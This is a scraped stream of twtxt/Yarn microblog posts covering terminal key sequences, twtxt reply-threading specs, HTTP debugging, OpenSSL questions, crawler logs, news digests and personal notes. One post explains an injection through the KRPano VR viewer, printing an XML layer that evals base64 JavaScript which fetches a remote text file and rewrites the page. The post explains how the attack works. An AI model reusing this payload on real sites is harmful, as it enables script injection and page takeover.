Well, some time ago I put this in my ~/.Xdefaults:

URxvt.keysym.Control-Up:    \033[1;5A
    URxvt.keysym.Control-Down:  \033[1;5B
URxvt.keysym.Control-Left:  \033[1;5D
    URxvt.keysym.Control-Right: \033[1;5C

Probably to behave more like XTerm and fix a few other issues I had with other programs. But, it turns out, tcell expects the original sequence: https://github.com/gdamore/tcell/blob/main/terminfo/r/rxvt/term.go#L487

Hmm.

Hmmm, when I Ctrl+Left to jump a word left, I get 1;5D in my tt2 message text. My TERM is set to rxvt-unicode-256color. In tt, it works just fine. When I change to TERM=xterm-256color, it also works in tt2. I have to read up on that. Maybe even try to capture these sequences and rewrite them.

@eapl.me@eapl.me Cool!

Proposal 3 (https://git.mills.io/yarnsocial/twtxt.dev/issues/18#issuecomment-19215) has the “advantage”, that you do not have to “mention” the original author if the thread slightly diverges. It seems to be a thing here that conversations are typically very flat instead of trees. Hence, and despite being a tree hugger, I voted for 3 being my favorite one, then 2, 1 and finally 4.

All proposals still need more work to clarify the details and edge cases in my opinion before they can be implemented.

Dark energy might be weakening + 1 more story
Scientists create largest 3D universe map, suggesting dark energy may weaken; Research shows modern humans evolved from two ancient populations. ⌘ Read more

@andros@twtxt.andros.dev Can you reproduce any of this outside of your client? I can’t spot a mistake here:

$ curl -sI 'http://movq.de/v/8684c7d264/.html%2Dindex%2Dthumb%2Dgimp11%2D1.png.jpg'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 2615
Content-Type: image/jpeg
Date: Wed, 19 Mar 2025 19:53:17 GMT
Last-Modified: Wed, 19 Mar 2025 17:34:08 GMT
Server: OpenBSD httpd

$ curl -sI 'https://movq.de/v/8684c7d264/gimp11%2D1.png'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 131798
Content-Type: image/png
Date: Wed, 19 Mar 2025 19:53:19 GMT
Last-Modified: Wed, 19 Mar 2025 17:18:07 GMT
Server: OpenBSD httpd

$ telnet movq.de 80
Trying 185.162.249.140...
Connected to movq.de.
Escape character is '^]'.
HEAD /v/8684c7d264/.html%2Dindex%2Dthumb%2Dgimp11%2D1.png.jpg HTTP/1.1
Host: movq.de
Connection: close

HTTP/1.1 200 OK
Connection: close
Content-Length: 2615
Content-Type: image/jpeg
Date: Wed, 19 Mar 2025 19:53:31 GMT
Last-Modified: Wed, 19 Mar 2025 17:34:08 GMT
Server: OpenBSD httpd

Connection closed by foreign host.
$ 

@eapl.me@eapl.me Good job! I have added these comments:

1. It is only long for humans. Clients can only leave a hyperlink.
   
2. The nickname is just a decoration, only the date that acts as the id and the URL matter. The nick is used for humans reading the feed.
   
3. It can be migrated with a script, if the feed exists.

GIMP 1.1 on SuSE 6.4 with good old GTK 1:

Timeline and twtxt-php, don’t support Gemini, only HTTP/S, as a design choice (although originally it was intended to work on Gemtext, it was a niche inside a niche, so it was discarded very soon).

At the moment of building the engine there weren’t many Gemini URLs supporting twtxt 1.1 (with twtxt.dev extensions).
Also User-Agent won’t work there, and many Gemini URLs are a mirror of the HTTP one, so I think is not strictly necessary.

my 2c

Enlightenment 0.27.1 released
A few months after 0.27.0 was released, we’ve got a small update for Enlightenment today, version 0.27.1. It’s a short list of bugfixes, and one tiny new feature: you can now use the scroll wheel to change the volume when your cursor is hovering over the mixer controls. That’s it. That’s the release. ⌘ Read more

La musique de Chronokinesie est très bien pour se concentrer. Là, je corrige mes copies avec, merci les compositeurs! https://www.youtube.com/watch?v=rQxNYqa7Lec&list=OLAK5uy_lTJtJNdh0CORziaQH_YDsXLVF-_QbJyRQ&index=1

Israel strikes Gaza, ending ceasefire + 3 more stories
Israel breaks Gaza ceasefire, conducting deadly airstrikes. Webb telescope sees CO2 on exoplanets. Germany’s €1 trillion debt plan faces debate. Global trade hits $33 trillion. ⌘ Read more

Chapter 1:
Chapter 2:

if you want a different voice let me know which to use: https://rhasspy.github.io/piper-samples/

North Korea reveals new nuclear-powered submarine + 1 more story
Russia reclaims territory with help from North Korea; North Korea unveils new nuclear submarine. ⌘ Read more

Zen and the art of microcode hacking
Now that we have examined the vulnerability that enables arbitrary microcode patches to be installed on all (un-patched) Zen 1 through Zen 4 CPUs, let’s discuss how you can use and expand our tools to author your own patches. We have been working on developing a collection of tools combined into a single project we’re calling zentool. The long-term goal is to provide a suite of capabilities similar to binutils, but targeting AMD microcode instead of CPU mach … ⌘ Read more

For point 1 and others using the metadata tags. we have implemented them in yarnd as [lang=en][meta=data]

Over half of adults predicted to be obese by 2050 + 1 more story
Study predicts over half of adults will be obese by 2050; Trump imposes steep tariffs on Canada, Mexico, and China ⌘ Read more

looks good to me!

About alice’s hash, using SHA256, I get 96473b4f or 96473B4F for the last 8 characters. I’ll add it as an implementation example.
The idea of including it besides the follow URL is to avoid calculating it every time we load the file (assuming the client did that correctly), and helps to track replies across the file with a simple search.

Also, watching your example I’m thinking now that instead of {url=96473B4F,id=1} which is ambiguous of which URL we are referring to, it could be something like:
{reply_to=[URL_HASH]_[TWT_ID]} / {reply_to=96473B4F_1}
That way, the ‘full twt ID’ could be 96473B4F_1.

@andros@twtxt.andros.dev

• System Design Interview Vol. 1 and 2, Alex Xu and Sahn Lam
  
• Designing Data-Intensive Applications, Martin Kleppmann

Trump threatens 25% tariffs on EU imports + 1 more story
Trump proposes 25% tariffs on EU imports; Ukraine and the U.S. approach a mineral rights deal ⌘ Read more

12 years of incubating Wayland color management
The Wayland color-management protocol extension has landed on Feb 13th, 2025, in upstream wayland-protocols repository in the staging directory. It was released with wayland-protocols 1.41. The extension enables proper interactions between traditional (sRGB), Wide Color Gamut (WCG), and High Dynamic Range (HDR) image sources and displays once implemented in Wayland compositors and used in applications. Of course, a protocol is just a la … ⌘ Read more

Europe launches advanced AI weather forecasting system + 1 more story
Europe launches an advanced AI weather forecasting system for improved predictions; Israel demands demilitarization of southern Syria amid rising tensions. ⌘ Read more

And, Ramadan is next week. So, we switched to UTC from UTC+1 in the weekend. As if it’s going to make the days any shorter 😅

Microsoft unveils experimental quantum chip using new state of matter + 1 more story
Microsoft unveils a new chip that accelerates quantum computing; Nvidia launches Evo 2, largest AI system for genetic research ⌘ Read more

@arne@uplegger.eu Hi! I love that you’re implementing it! Maybe, when we’re both done, we could test the clients by communicating both.
I don’t think I’m going to be able to help you much, my knowledge of OpenSSL and PHP is not as high as I’d like it to be.
Maybe the OpenSSL version uses SHA-1 by default in PHP. Or that the IV is derived together with the key (not generated separately). But I’m not able to answer your questions, sorry.
I’m invoking the commands directly, without any libraries in between. Maybe that would help you?

@arne@uplegger.eu Well, just for my understanding. The command:
echo "Lorem ipsum" | openssl enc -aes-256-cbc -pbkdf2 -iter 100000 -out message.enc -pass file:shared_key.bin
will take the input string from echo to openssl. It then will

1. use the content of shared_key.bin as password
   
2. use PBKDF2 with an iteration of 100000 to generate a encryption key from the given password (shared_key.bin)
   
3. use the PBKDF2 generated key for an aes-256-cbc encryption
   

The final result is encrypted data with the prepended salt (which was generated by runtime), e.g.: Salted__q�;��-�T���"h%��5�� ....

With a dummy script I now can generate a valide shared key within PHP ‘openssl_pkey_derive()’ - identical to OpenSSL.
I also can en-/decrypt salted data within my script, but not with OpenSSL. There are several parameters of PBKDF2 unknown to me.

Question:

1. Is the salt, used by aes-256-cbc and PBKDF2 the same, prepended in the encrypted data?
   
2. Witch algorithm/cipher is used within PBKDF2: sha1, sha256, …?
   
3. What is the desired key length of PBKDF2 (https://www.php.net/manual/en/function.openssl-pbkdf2.php)?
   

To be continued …

@eapl.me@eapl.me I can do that as soon as I get back home. Also, just in case you’ve missed it, Choice 1 is actually 4 different variations.

I’m surprised, here you can’t find dial controls anymore. How old are your ovens? The last one my parents had was from the 90s.

I was amazed experimenting with different combinations, for instance instead of 100, using 60 for a minute, 90 for 1:30, and stupid stuff like heating with 11, 22, 55 seconds and so, to make it quicker to type any time.

ArcaOS 5.1.1 released
It’s been two years since the release of ArcaOS 5.1, which was a hugely important release because it brought UEFI support to this continuation of IBM’s OS/2, ensuring longevity for the project for years to come. Since I don’t think much is known about what, exactly, Arca Noae, and eComStation before it, has access to within the licensing agreement with IBM, it’s difficult to ascertain just how much room they actually have to make changes to the code at the core of the old OS/2. Regardles … ⌘ Read more

Bloody hell 🤦‍♂️🤦‍♂️

$ jq -r --arg host "gopher.mills.io" '. | select(.request.host==$host) | "\(.request.client_ip) \(.request.uri) \(.request.headers["User-Agent"])"' mills.io.log-au | while IFS=$' ' read -r ip uri ua; do asn="$(geoip -a "$ip")"; echo "$asn $ip $uri $ua"; done | grep -E '^45102.*' | sort | head
45102 47.251.70.245 /gopher.floodgap.com/0/feeds/democracynow/2015/Oct/14/0 ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"]
45102 47.251.84.25 /gopher.floodgap.com/0/feeds/voaheadlines/2014/Mar/09/voanews.com-content-article-1867433.html ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"]
45102 47.82.10.106 /gopher.viste.fr/1/OnlineTools/hangman.cgi%3F0692937396569A52972EB2 ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"]
45102 47.82.10.106 /gopher.viste.fr/1/OnlineTools/hangman.cgi%3F9657307A96569A52974634 ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"]
45102 47.82.10.106 /gopher.viste.fr/1/OnlineTools/hangman.cgi%3FB7571C7896569A529E6603 ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"]
45102 47.82.10.106 /gopher.viste.fr/1/OnlineTools/hangman.cgi%3FB75EF81296569A529E6617 ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"]
45102 47.82.10.106 /gopher.viste.fr/1/OnlineTools/hangman.cgi%3FC6564ADB96569A5A9E660C ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"]

Trump announces new tariffs on major trading partners + 1 more story
Trump announces new global tariffs impacting India, Japan, and the EU; Zelenskyy calls for a unified European army amid rising Russian threats ⌘ Read more

You have a microwave oven at home, right?

You can type 3 and 0 for 30 seconds, 100 for a minute (shown as 1:00), or 200 for two minutes (2:00).

What would happen if you type 777 and Start?
A) Nothing
B) Self-destruction
C) Will run for 7 minutes and 77 seconds (boring!)

What about 7777 ?

@andros@twtxt.andros.dev it seems your GtS has issues:

Warning! It looks like trusted-proxies is not set correctly in this instance’s configuration. This may cause rate-limiting issues and, by extension, federation issues.

If you are the instance admin, you should fix this by adding 10.66.66.1/32 to your trusted-proxies.

Testing the limits of our new 5G internet connection at home with pushing 1.5GB docker images into the cloud a bunch of times day…

reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:

• (810) bingbot
  
• (641) Googlebot
  
• (624) http://www.google.com/bot.html
  
• (545) DotBot
  
• (290) GPTBot
  
• (106) SemrushBot
  
• (84) AhrefsBot
  
• (62) MJ12bot
  
• (60) BLEXBot
  
• (55) wpbot
  
• (37) Amazonbot
  
• (28) YandexBot
  
• (22) ClaudeBot
  
• (19) AwarioBot
  
• (14) https://domainsbot.com/pandalytics
  
• (9) https://serpstatbot.com
  
• (6) t3versionsBot
  
• (6) archive.org_bot
  
• (6) Applebot
  
• (5) http://search.msn.com/msnbot.htm
  
• (4) http://www.googlebot.com/bot.html
  
• (4) Googlebot-Mobile
  
• (4) DuckDuckGo-Favicons-Bot
  
• (3) https://turnitin.com/robot/crawlerinfo.html
  
• (3) YandexNews
  
• (3) ImagesiftBot
  
• (2) Qwantify-prod
  
• (1) http://www.google.com/adsbot.html
  
• (1) http://gais.cs.ccu.edu.tw/robot.php
  
• (1) YaK
  
• (1) WBSearchBot
  
• (1) DataForSeoBot
  

i have placed some middleware to reject these for now but it is not a full proof solution.

@andros@twtxt.andros.dev The article is a good reminder of the true blogging mindset. But let’s try to think beyond. 2 ideas: (1) writing “forces clarity, structures your thoughts, sharpens your perspective”. But it also generates thoughts in the sense of Heinrich von Kleist (1805). (2) You’re writing for “the future you, one right person, one day” but you are also writing for the AI. The idea of AI as an audience.

My hike today started off with a nice great spotted woodpecker right after the town sign. The -1°C didn’t feel all that cold in the sun. Even on the flat, I had to open my jacket with the sun on my back. The biotope got dug over, that’s now looking really sad. And they also fell a few large chestnuts. Surprisingly, there was actually snow on the mountain. Not much, maybe around three centimeters at most. It was melting and falling down the trees, which looked really cool. I enjoyed it a lot: https://lyse.isobeef.org/waldspaziergang-2025-02-04/

Trump imposes tariffs on Canada, Mexico, China + 1 more story
Donald Trump imposes significant tariffs on Canada, Mexico, and China, leading to immediate retaliatory measures. China initiates construction of a massive military command center near Beijing to boost its military capabilities. ⌘ Read more

Building a (T1D) smartwatch from scratch
If you have type 1 diabetes, you need to keep track of and manage your blood glucose levels closely, as if these levels dip too low, it can quickly spiral into a medical emergency. Andrew Childs’ 9 year old son has type 1 diabetes, and Childs was unhappy with any of the current offerings on the market for children to keep track of their blood glucose levels. Most people suggested an Apple Watch, but he found the Apple Watch “too much device” for a kid, … ⌘ Read more

@arne@uplegger.eu Ohjemine, TYPO3! O_o Lass mich schreiend davonlaufen!

Mit dieser absoluten Katastrophensoftware vor dem Herrn haben wir mal ein Studienprojekt gemacht. Die hat alle Vorurteile komplett übererfüllt. Angefangen von Fehlerseiten, die statt 4xx oder dergleichen immer mit HTTP 200 ausgeliefert wurden oder auch, dass das generierte HTML leider einfach ungültig war. Über die Implementierung von Löschen durch einen Deleted-Schalter in der Datenbank, das Speichern von Passwörtern im Klartext bis hin zu völlig umständlichen Bedienungskonzepten. Alles hat immer brutal viele Schritte gebraucht. Das Zeilennummernrumgeeier im TYPO-Script erinnerte eher an Basic. Uns kam es auch so vor, als ob man damit nicht ernsthaft was sinnvolles machen könnte.

Zu allem Überfluss hatte irgendwer noch ein ganz hundsmiserables Buch ausgegraben, das als Vorbereitung dienen sollte. Ich kann mich zum Glück weder an den Titel noch den Autor erinnern, aber ich weiß noch, wie das komplett inkonsistent geschrieben war. Anfangs gabs mehrere Seiten zu Unicode und UTF-8 wurde angepriesen, aber alle Beispiele haben dann auf ISO-8859-1 gesetzt. Gezeigter Beispielcode war häufig unterste Schublade. Selten hab ich so merkwürdige Erklärungen gelesen: „Wenn Sie die Sicherheitswarnhinweise stören, kommentieren Sie doch bitte im Quelltext die die()-Funktion in $ZEILE aus.“ Oder ein anderer Klassiker: „Ausgeschrieben würde der Code wohl folgendes tun…“. War sich der Autor also nicht ganz sicher, ob sein Codeschnipsel vllt. doch in Wahrheit was ganz anderes tut.

Seit diesem gigantischen Trauma (das hat mich wirklich sehr nachhaltig geprägt, wie man Dinge nicht machen sollte) hab ich erfolgreich einen Bogen um das TYPO3-Universum gemacht.

Ich kann nur hoffen, dass es zwischenzeitlich ein wenig besser geworden ist. Aber Deinem Kurzbericht zufolge scheint da ja immer noch der Wurm drin zu sein. Mein Beileid! :-(

Apple’s macOS UNIX certification is a lie
As an online discussion grows longer, the probability of a someone mentioning macOS is a UNIX approaches 1. In fact, it was only late last year that The Open Group announced that macOS 15.0 was, once again, certified as UNIX, continuing Apple’s long-standing tradition of certifying macOS releases as “real” UNIX®. What does any of this actually, mean, though? Well, it turns out that if you actually dive into Apple’s conformance statements for macOS’ … ⌘ Read more

Heute war ich mit dem Ziehkind in der Stadt unterwegs.
Mitten beim Eisschlecken fährt die Polizei in einem zivilen Wagen quer durch die Fußgängerzone. An der Bank am Markt dann weitere Uniformierte und kein Einlass für Kunden.
Da mussten wir uns in der Stadtbibliothek erst einmal Material zu dem Thema besorgen.

Android 16 Beta 1 has started rolling out for Pixel devices
Basically, this seems to mean applications will no longer be allowed to limit themselves to phone size when running on devices with larger screens, like tablets. Other tidbits in this first beta include predictive back support for 3-button navigation, support for the Advanced Professional Video codec from Samsung, among other things. It’s still quite early in the release process, so more is sure to come, and some … ⌘ Read more

Fusion reactor breaks 1,000 seconds record + 3 more stories
Chinese scientists break nuclear fusion record with 1,066 seconds at 100 million Celsius; US launches $500 billion AI infrastructure The Stargate Project; AI-designed drugs from Isomorphic Labs set for clinical trials by 2026; New AI method shows 90-100% accuracy in early breast cancer detection. ⌘ Read more

Linux 6.13 released
Linux 6.13 comes with the introduction of the AMD 3D V-Cache Optimizer driver for benefiting multi-CCD Ryzen X3D processors, the new AMD EPYC 9005 “Turin” server processors will now default to AMD P-State rather than ACPI CPUFreq for better power efficiency, the start of Intel Xe3 graphics bring-up, support for many older (pre-M1) Apple devices like numerous iPads and iPhones, NVMe 2.1 specification support, and AutoFDO and Propeller optimization support when compiling the Linux kernel with … ⌘ Read more

This is an absolutely amazing talk about fixing a satellite in space. Totally worth watching, highly recommended. Super great engineering! I’m blown away, this is sooooo cool! https://media.ccc.de/v/38c3-hacking-yourself-a-satellite-recovering-beesat-1

@kat@yarn.girlonthemoon.xyz I approve! That’s how I learned HTML (version 4 at the time and XHTML shortly after) and making websites, too. Some of them are still made like this to this day. Hand-written HTML. Hardly any <div> and class nonsense. I can’t remember with which editor I started out with, but I upgraded to Webweaver (later renamed to Webcraft) quickly. Yeah, this were the times when there was just a single computer for the whole family.

Free hosting on Arcor, Freenet and I don’t know anymore how they were all called. Like this author, I uploaded everything via FTP. Oh dear, when was the last time I used that? And I had registered plenty of free .de.vu domains.

Being on Windows at the time, everything was ISO-8859-1 for me. No UTF-8, I don’t think I’ve heard about it back then.

Later, I wrote my own CMSes in PHP. Man, were they bad in retrospect. :-D Of course, MySQL databases were used as backends. I still exactly know the moment I read the first time about SQL injections. I tried it on my own CMS login and was shocked when I could just break in. The very next thing I did was to lock down everything with an .htaccess until I actually fixed my broken PHP code. Hahaha, good memories.

I swear by Atom or RSS feeds. Many of my sites offer them. I daily consume feeds, they’re just great.

So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following

<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>

the omit above is base64 encoded script below:

const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');

this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.

@prologic@twtxt.net I say we should find a way to support mentions with only url, no nick, as per the original spec.

• For @<nick url> we already got support
  
• For @<nick> the posting client should expand it to @<nick url>, if not then the reading client should just render it as @nick with no link.
  
• For @<url> the sending client should try to expand it to @<nick url>, if not then the reading client should try to find or construct a nick base on:
  
  1. Look in twtxt.txt for a nick =
     
  2. Use (sub)domain from URL
     
  3. Use folder or file name from URL

Global temperatures surpassed 1.5C + 2 more stories
Global temperatures surpassed 1.5C this year; the World Economic Forum forecasts 170 million new jobs by 2030; Russia halts gas supplies to Europe. ⌘ Read more

Need to summary all of these logic. So:\u2028 1. If file named twtxt.txt then grab parent directory name or hostname if file in root (and maybe delete ~?) \u2028 2. If file named nick.txt then grab filename